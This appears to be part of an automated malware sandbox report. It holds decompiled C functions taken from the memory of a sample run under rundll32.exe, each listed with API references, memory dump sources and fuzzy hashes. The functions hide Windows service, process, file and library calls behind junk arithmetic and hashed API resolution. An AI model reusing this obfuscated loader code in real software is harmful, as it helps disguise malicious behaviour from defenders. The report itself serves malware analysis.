				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0038602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E003907A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00385fb5
0x00385fb6
0x00385fb7
0x00385fbb
0x00385fbc
0x00385fc1
0x00385fcb
0x00385fd7
0x00385fde
0x00385fe5
0x00385ffc
0x00385fff
0x00386006
0x0038600d
0x0038601a
0x00386025
0x0038602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00386025

Memory Dump Source

Source File: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000B.00000002.2118300491.0000000000380000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2118380774.000000000039C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 28e943fc70cda17387a01dd2c4ccaf116409baa189fd8010587655df5647f8a3
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: E1F031B0811208FFDB08DFA0E94689EBFB9EB40300F108198E409A7260D7715F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2856 Parent PID: 2468 rundll32.exeCOMMON

Executed Functions

Function 00222959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00222959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0022602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002307A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0022295f
0x00222964
0x00222967
0x0022296a
0x0022296d
0x0022296e
0x0022296f
0x00222977
0x00222985
0x0022298a
0x00222992
0x0022299a
0x002229a2
0x002229a9
0x002229b0
0x002229b7
0x002229bb
0x002229cf
0x002229dc
0x002229e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002229DC

Strings

<^, xrefs: 00222977

Memory Dump Source

Source File: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2119515961.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2119584774.000000000023C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 37b4d298cd155c94a1be96190f1608c22ec2d5d7dc8241c68084df23160ea007
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: E5016D72A00108BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0022C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0022C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0022602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002307A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0022c6e1
0x0022c6e6
0x0022c6f0
0x0022c6fc
0x0022c703
0x0022c706
0x0022c70d
0x0022c711
0x0022c715
0x0022c71c
0x0022c723
0x0022c72a
0x0022c731
0x0022c738
0x0022c751
0x0022c762
0x0022c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0022C762

Strings

/O, xrefs: 0022C6E6

Memory Dump Source

Source File: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2119515961.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2119584774.000000000023C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 9aff3a284bdbc7005846512a2e192847c3488d4c6c202e5d49d862151a6953d0
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 711133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3B14B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00221000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00221000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0022602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002307A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00221006
0x00221009
0x0022100c
0x00221011
0x00221016
0x0022101d
0x00221026
0x0022102d
0x00221034
0x0022103b
0x00221047
0x0022104f
0x00221057
0x0022105e
0x00221065
0x0022106c
0x00221073
0x00221077
0x0022108b
0x00221096
0x0022109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00221096

Strings

[, xrefs: 0022103B

Memory Dump Source

Source File: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2119515961.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2119584774.000000000023C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 9b0b4243c09f153743ba963f172af61627f32187394d3e2d1bec8dfbc1c5dfe0
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 8C015BB6D01308BBDF04DFA4C94A5DEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00224859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00224859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002307A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0022485e
0x0022487a
0x0022487d
0x00224884
0x0022488b
0x00224892
0x0022489d
0x002248a0
0x002248ad
0x002248b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002248B7

Strings

[, xrefs: 0022488B

Memory Dump Source

Source File: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2119515961.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2119584774.000000000023C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 81f399a38b3290deff4e9d0da5b8e83badc44d24b0f9d8852c102545871cb71b
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 7AF017B0A15209FBDB04CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00234F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00234F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002307A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00234f80
0x00234f81
0x00234f82
0x00234f86
0x00234f87
0x00234f8c
0x00234fa5
0x00234fa8
0x00234faf
0x00234fb6
0x00234fc7
0x00234fca
0x00234fd7
0x00234fe2
0x00234fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00234FE2

Strings

{#lm, xrefs: 00234FC2

Memory Dump Source

Source File: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2119515961.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2119584774.000000000023C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 425c42de30eaec02a6b06aeb807420b13a9b3e840beb4bdeece3b006ea06cbfa
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: E9F037B181120CFFDB04DFA4D98689EBFBAEB40300F208199E804AB250D3715B50AB50

Uniqueness

Uniqueness Score: -1.00%

Function 0023976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0023976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002307A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00239772
0x00239773
0x00239778
0x0023977a
0x0023977b
0x0023977e
0x0023977f
0x00239782
0x00239785
0x00239788
0x00239789
0x0023978c
0x0023978f
0x00239790
0x00239791
0x00239794
0x00239797
0x0023979a
0x0023979d
0x002397a0
0x002397a3
0x002397a6
0x002397a7
0x002397a8
0x002397ad
0x002397b7
0x002397c3
0x002397ca
0x002397d1
0x002397d8
0x002397df
0x002397e3
0x002397fc
0x00239816
0x0023981d

APIs

CreateProcessW.KERNEL32(0022591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0022591A), ref: 00239816

Memory Dump Source

Source File: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2119515961.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2119584774.000000000023C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 9a7324920c6fa73872278b88570e0d2bf5650161ff1a26a3230580b4f81e3e9e
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 3B11B072911188BBDF1A9FD6DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0022B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0022B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0022602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002307A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0022b569
0x0022b56a
0x0022b56d
0x0022b572
0x0022b574
0x0022b577
0x0022b57a
0x0022b57d
0x0022b580
0x0022b583
0x0022b586
0x0022b587
0x0022b58a
0x0022b58d
0x0022b590
0x0022b593
0x0022b594
0x0022b595
0x0022b59a
0x0022b5a4
0x0022b5b8
0x0022b5c0
0x0022b5c4
0x0022b5cb
0x0022b5d2
0x0022b5d9
0x0022b5e6
0x0022b5fd
0x0022b604

APIs

CreateFileW.KERNELBASE(00230668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00230668,?,?,?,?), ref: 0022B5FD

Memory Dump Source

Source File: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2119515961.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2119584774.000000000023C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: e1549cc0f43a334951d18b49cf8d68a4c31339b5c1d8a32f795c95a95794c2c5
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 8511C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0023981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0023981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002307A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00239821
0x00239822
0x00239825
0x00239828
0x0023982a
0x0023982c
0x0023982f
0x00239832
0x00239835
0x00239836
0x00239837
0x0023983c
0x00239855
0x00239858
0x0023985f
0x00239866
0x0023986d
0x00239874
0x0023987b
0x0023988e
0x0023989b
0x002398a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002287F2,0000CAAE,0000510C,AD82F196), ref: 0023989B

Memory Dump Source

Source File: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2119515961.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2119584774.000000000023C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: befe9fe0183202295763c4f616bb3e888194596f68a67a8b2acadb36196cd915
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 92015A76801208FBDB04EFE5DC46CDFBF79EF85750F108199F918A6220E6719B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00237BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00237BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002307A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00237bf7
0x00237bf8
0x00237bfa
0x00237bfd
0x00237bff
0x00237c02
0x00237c06
0x00237c07
0x00237c0f
0x00237c1d
0x00237c25
0x00237c2d
0x00237c31
0x00237c38
0x00237c3f
0x00237c46
0x00237c4a
0x00237c5e
0x00237c67
0x00237c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00237C67

Memory Dump Source

Source File: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2119515961.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2119584774.000000000023C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 0e41601c5170870fff14c69e3aeec768b21d7b82c6e0726c682f4726547fb5ef
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: D2014FB190120CFFEB09DFA4D84A8DEBBB5EF44314F108198F40567240E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0022F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0022F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002307A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0022f662
0x0022f663
0x0022f665
0x0022f668
0x0022f66a
0x0022f66d
0x0022f670
0x0022f673
0x0022f677
0x0022f678
0x0022f67d
0x0022f687
0x0022f693
0x0022f69a
0x0022f6a1
0x0022f6a5
0x0022f6a9
0x0022f6b0
0x0022f6c9
0x0022f6d8
0x0022f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0022F6D8

Memory Dump Source

Source File: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2119515961.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2119584774.000000000023C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: c219bc23b31abedc45fcf728708936782f9d9bba77c4ca36990c459a2553eb13
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 3001E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25F21EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0022B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0022B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0022602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002307A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0022b6f3
0x0022b6f8
0x0022b702
0x0022b70b
0x0022b712
0x0022b719
0x0022b720
0x0022b727
0x0022b72e
0x0022b747
0x0022b759
0x0022b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0022B759

Memory Dump Source

Source File: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2119515961.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2119584774.000000000023C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 805ceceae2d365355b6515513bd125146e4d87094100ab013cfcd0affd305b92
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 99012CB6951308FBEB45DF94DD06A9E7BB5EB14704F108188FA0566190D3B15A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0023AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0023AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002307A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0023aa3f
0x0023aa40
0x0023aa41
0x0023aa44
0x0023aa47
0x0023aa4b
0x0023aa4c
0x0023aa51
0x0023aa5b
0x0023aa64
0x0023aa68
0x0023aa6f
0x0023aa76
0x0023aa8d
0x0023aa90
0x0023aa9d
0x0023aaa8
0x0023aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0023AAA8

Memory Dump Source

Source File: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2119515961.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2119584774.000000000023C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 9cd5d96fc3e82e5584044280d79d9400fa05233e4d0ba42093466a1b2956cd93
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 37F069B191020CFFDF08DFA4DD4A89EBFB4EB40304F108088F805A6250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00225FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00225FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
